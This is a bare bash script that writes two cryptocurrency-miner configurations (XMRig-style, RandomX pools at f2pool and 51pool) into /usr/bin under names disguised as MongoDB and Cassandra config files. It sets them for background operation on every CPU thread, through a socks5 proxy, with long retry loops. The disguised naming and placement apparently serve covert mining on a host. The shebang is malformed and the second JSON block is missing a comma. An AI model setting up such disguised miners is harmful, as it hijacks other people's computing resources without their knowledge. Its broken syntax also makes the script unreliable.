#/bin/bash
cd /usr/bin

echo '{
    "autosave": false,
    "background": true,
    "colors": false,
    "randomx": {
        "init": -1
    },
    "cpu": {
        "enabled": true,
        "rx": [-1, -1, -1, -1, -1, -1, -1, -1]
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "pools": [
        {
            "enabled": true,
            "algo": "rx/0",
            "url": "xmr.f2pool.com:13531",
            "user": "YOUR_WALLET_ADDRESS",
            "pass": "x",
            "rig-id": "green",
            "socks5": "1.1.1.1:80"
        }
    ],
    "print-time": 3600,
    "retries": 4320,
    "retry-pause": 20
}' > mongocfg


echo '{
    "autosave": false,
    "background": true,
    "colors": false,
    "randomx/epic": {
        "init": -1
    },
    "cpu": {
        "enabled": true,
        "rx": [-1, -1, -1, -1, -1, -1, -1, -1]
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "pools": [
        {
            "enabled": true,
            "algo": "randomx/epic",
            "url": "51pool.online:4416",
            "user": "USERNAME;WORKERNAME",
            "pass": "abcd1234",
            "socks5": "1.1.1.1:80"
        }
    ],
    "print-time": 3600,
    "user-agent": "xmrig/v-epic-0.0.1"
    "retries": 4320,
    "retry-pause": 20
}' > cassandracfg

